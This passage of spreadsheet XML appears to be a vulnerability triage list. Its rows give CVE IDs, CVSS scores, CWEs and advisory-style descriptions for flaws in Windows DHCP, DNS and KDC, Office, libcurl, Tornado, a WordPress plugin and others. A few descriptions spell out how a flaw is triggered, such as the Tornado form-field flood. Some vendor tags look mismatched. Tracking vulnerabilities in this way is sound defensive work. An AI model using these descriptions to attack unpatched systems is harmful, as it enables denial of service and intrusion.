      <c r="E1121" s="5" t="inlineStr"/>
      <c r="F1121" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G1121" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1121" s="5" t="inlineStr"/>
      <c r="I1121" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1121" s="5" t="inlineStr"/>
      <c r="K1121" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L1121" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77494</t>
        </is>
      </c>
    </row>
    <row r="1122">
      <c r="A1122" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77498</t>
        </is>
      </c>
      <c r="C1122" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1122" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1122" s="5" t="inlineStr"/>
      <c r="F1122" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1122" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1122" s="5" t="inlineStr"/>
      <c r="I1122" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1122" s="5" t="inlineStr"/>
      <c r="K1122" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1122" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77498</t>
        </is>
      </c>
    </row>
    <row r="1123">
      <c r="A1123" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77499</t>
        </is>
      </c>
      <c r="C1123" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1123" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1123" s="5" t="inlineStr"/>
      <c r="F1123" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1123" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1123" s="5" t="inlineStr"/>
      <c r="I1123" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1123" s="5" t="inlineStr"/>
      <c r="K1123" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L1123" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77499</t>
        </is>
      </c>
    </row>
    <row r="1124">
      <c r="A1124" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77501</t>
        </is>
      </c>
      <c r="C1124" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1124" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1124" s="5" t="inlineStr"/>
      <c r="F1124" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1124" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1124" s="5" t="inlineStr"/>
      <c r="I1124" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1124" s="5" t="inlineStr"/>
      <c r="K1124" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1124" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77501</t>
        </is>
      </c>
    </row>
    <row r="1125">
      <c r="A1125" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77502</t>
        </is>
      </c>
      <c r="C1125" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1125" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1125" s="5" t="inlineStr"/>
      <c r="F1125" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1125" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1125" s="5" t="inlineStr"/>
      <c r="I1125" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1125" s="5" t="inlineStr"/>
      <c r="K1125" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1125" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77502</t>
        </is>
      </c>
    </row>
    <row r="1126">
      <c r="A1126" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77886</t>
        </is>
      </c>
      <c r="C1126" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1126" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1126" s="5" t="inlineStr"/>
      <c r="F1126" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1126" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1126" s="5" t="inlineStr"/>
      <c r="I1126" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1126" s="5" t="inlineStr"/>
      <c r="K1126" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1126" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77886</t>
        </is>
      </c>
    </row>
    <row r="1127">
      <c r="A1127" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77888</t>
        </is>
      </c>
      <c r="C1127" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1127" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1127" s="5" t="inlineStr"/>
      <c r="F1127" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1127" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1127" s="5" t="inlineStr"/>
      <c r="I1127" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1127" s="5" t="inlineStr"/>
      <c r="K1127" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L1127" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77888</t>
        </is>
      </c>
    </row>
    <row r="1128">
      <c r="A1128" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77889</t>
        </is>
      </c>
      <c r="C1128" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1128" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1128" s="5" t="inlineStr"/>
      <c r="F1128" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1128" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1128" s="5" t="inlineStr"/>
      <c r="I1128" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1128" s="5" t="inlineStr"/>
      <c r="K1128" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L1128" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77889</t>
        </is>
      </c>
    </row>
    <row r="1129">
      <c r="A1129" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77890</t>
        </is>
      </c>
      <c r="C1129" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1129" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1129" s="5" t="inlineStr"/>
      <c r="F1129" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1129" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1129" s="5" t="inlineStr"/>
      <c r="I1129" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1129" s="5" t="inlineStr"/>
      <c r="K1129" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L1129" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77890</t>
        </is>
      </c>
    </row>
    <row r="1130">
      <c r="A1130" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77893</t>
        </is>
      </c>
      <c r="C1130" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1130" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1130" s="5" t="inlineStr"/>
      <c r="F1130" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1130" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1130" s="5" t="inlineStr"/>
      <c r="I1130" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1130" s="5" t="inlineStr"/>
      <c r="K1130" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1130" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77893</t>
        </is>
      </c>
    </row>
    <row r="1131">
      <c r="A1131" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77895</t>
        </is>
      </c>
      <c r="C1131" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1131" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1131" s="5" t="inlineStr"/>
      <c r="F1131" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G1131" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1131" s="5" t="inlineStr"/>
      <c r="I1131" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1131" s="5" t="inlineStr"/>
      <c r="K1131" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1131" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77895</t>
        </is>
      </c>
    </row>
    <row r="1132">
      <c r="A1132" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77898</t>
        </is>
      </c>
      <c r="C1132" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1132" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1132" s="5" t="inlineStr"/>
      <c r="F1132" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1132" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1132" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I1132" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1132" s="5" t="inlineStr"/>
      <c r="K1132" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1132" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77898</t>
        </is>
      </c>
    </row>
    <row r="1133">
      <c r="A1133" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78523</t>
        </is>
      </c>
      <c r="C1133" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1133" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1133" s="5" t="inlineStr"/>
      <c r="F1133" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1133" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1133" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I1133" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1133" s="5" t="inlineStr"/>
      <c r="K1133" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1133" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78523</t>
        </is>
      </c>
    </row>
    <row r="1134">
      <c r="A1134" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78543</t>
        </is>
      </c>
      <c r="C1134" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1134" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1134" s="5" t="inlineStr"/>
      <c r="F1134" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1134" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1134" s="5" t="inlineStr">
        <is>
          <t>ibm:app_connect_enterprise, ibm:integration_bus_for_z\/os</t>
        </is>
      </c>
      <c r="I1134" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1134" s="5" t="inlineStr"/>
      <c r="K1134" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="L1134" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.28 and IBM Integration Bus for z/OS 10.1.0.0 through 10.1.0.7 could allow a remote attacker to cause a denial of service due to an infinite loop.</t>
        </is>
      </c>
      <c r="M1134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78543</t>
        </is>
      </c>
    </row>
    <row r="1135">
      <c r="A1135" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78574</t>
        </is>
      </c>
      <c r="C1135" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1135" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1135" s="5" t="inlineStr"/>
      <c r="F1135" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1135" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H1135" s="5" t="inlineStr"/>
      <c r="I1135" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1135" s="5" t="inlineStr"/>
      <c r="K1135" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="L1135" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M1135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78574</t>
        </is>
      </c>
    </row>
    <row r="1136">
      <c r="A1136" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80229</t>
        </is>
      </c>
      <c r="C1136" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1136" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1136" s="5" t="inlineStr"/>
      <c r="F1136" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1136" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H1136" s="5" t="inlineStr"/>
      <c r="I1136" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J1136" s="5" t="inlineStr"/>
      <c r="K1136" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1136" s="5" t="inlineStr">
        <is>
          <t>When performing transfers via libcurl’s multi interface, pooled TLS
connections can outlive their originating easy handles. In OpenSSL 3 provider
configurations, libcurl attaches an allocated library context to the easy
handle's state and passes it to OpenSSL without acquiring an ownership
reference; destroying the easy handle prematurely frees this context while the
active connection retains a dangling pointer, leading to a heap-use-after-free
upon subsequent I/O or post-handshake operations.</t>
        </is>
      </c>
      <c r="M1136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80229</t>
        </is>
      </c>
    </row>
    <row r="1137">
      <c r="A1137" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80924</t>
        </is>
      </c>
      <c r="C1137" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1137" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1137" s="5" t="inlineStr"/>
      <c r="F1137" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1137" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H1137" s="5" t="inlineStr"/>
      <c r="I1137" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1137" s="5" t="inlineStr"/>
      <c r="K1137" s="5" t="inlineStr"/>
      <c r="L1137" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: krb5 - use kfree_sensitive() for derived key buffers
crypto_krb5_prepare_encryption() and crypto_krb5_prepare_checksum()
free the buffer holding the freshly derived keys with plain kfree(),
leaving the key material behind in the freed slab object.</t>
        </is>
      </c>
      <c r="M1137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80924</t>
        </is>
      </c>
    </row>
    <row r="1138">
      <c r="A1138" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81265</t>
        </is>
      </c>
      <c r="C1138" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1138" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1138" s="5" t="inlineStr"/>
      <c r="F1138" s="5" t="inlineStr"/>
      <c r="G1138" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1138" s="5" t="inlineStr"/>
      <c r="I1138" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1138" s="5" t="inlineStr"/>
      <c r="K1138" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1138" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5.</t>
        </is>
      </c>
      <c r="M1138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81265</t>
        </is>
      </c>
    </row>
    <row r="1139">
      <c r="A1139" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81270</t>
        </is>
      </c>
      <c r="C1139" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1139" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1139" s="5" t="inlineStr"/>
      <c r="F1139" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1139" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1139" s="5" t="inlineStr"/>
      <c r="I1139" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1139" s="5" t="inlineStr"/>
      <c r="K1139" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L1139" s="5" t="inlineStr">
        <is>
          <t>Apache Allura: exposure of non-public information via search.
This issue affects Apache Allura: through 1.20.0.
Users are recommended to upgrade to version 1.21.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M1139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81270</t>
        </is>
      </c>
    </row>
    <row r="1140">
      <c r="A1140" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82397</t>
        </is>
      </c>
      <c r="C1140" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1140" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1140" s="5" t="inlineStr"/>
      <c r="F1140" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1140" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1140" s="5" t="inlineStr"/>
      <c r="I1140" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1140" s="5" t="inlineStr"/>
      <c r="K1140" s="5" t="inlineStr">
        <is>
          <t>CWE-1284, CWE-400</t>
        </is>
      </c>
      <c r="L1140" s="5" t="inlineStr">
        <is>
          <t>Tornado is a Python web framework and asynchronous networking library. Prior to 6.5.8, Tornado parses application/x-www-form-urlencoded request bodies with urllib.parse.parse_qs in tornado/escape.py without passing max_num_fields. RequestHandler._execute in tornado/web.py parses the body before handler dispatch through HTTPServerRequest._parse_body and parse_body_arguments in tornado/httputil.py, so an unauthenticated request body containing millions of separator-delimited fields can synchronously stall the single-threaded event loop and delay every connection. The body is bounded only by max_buffer_size, which defaults to 104857600 bytes. This issue is fixed in version 6.5.8.</t>
        </is>
      </c>
      <c r="M1140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82397</t>
        </is>
      </c>
    </row>
    <row r="1141">
      <c r="A1141" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83989</t>
        </is>
      </c>
      <c r="C1141" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1141" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1141" s="5" t="inlineStr"/>
      <c r="F1141" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1141" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H114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41" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1141" s="5" t="inlineStr"/>
      <c r="K1141" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1141" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83989</t>
        </is>
      </c>
    </row>
    <row r="1142">
      <c r="A1142" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84001</t>
        </is>
      </c>
      <c r="C1142" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1142" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1142" s="5" t="inlineStr"/>
      <c r="F1142" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1142" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H114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142" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1142" s="5" t="inlineStr"/>
      <c r="K1142" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1142" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Key Distribution Center allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84001</t>
        </is>
      </c>
    </row>
    <row r="1143">
      <c r="A1143" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84219</t>
        </is>
      </c>
      <c r="C1143" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1143" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1143" s="5" t="inlineStr"/>
      <c r="F1143" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1143" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1143" s="5" t="inlineStr"/>
      <c r="I1143" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J1143" s="5" t="inlineStr"/>
      <c r="K1143" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1143" s="5" t="inlineStr">
        <is>
          <t>The Kirki  WordPress plugin before 6.3.0 does not hold back every spelling of the HTML entities it decodes when rendering, allowing unauthenticated users to store JavaScript in a comment which then runs in the session of anyone viewing a page that displays it, including an administrator, and on every page of the site when its header or footer is built to show comments.</t>
        </is>
      </c>
      <c r="M1143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84219</t>
        </is>
      </c>
    </row>
    <row r="1144">
      <c r="A1144" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84375</t>
        </is>
      </c>
      <c r="C1144" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1144" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1144" s="5" t="inlineStr"/>
      <c r="F1144" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1144" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
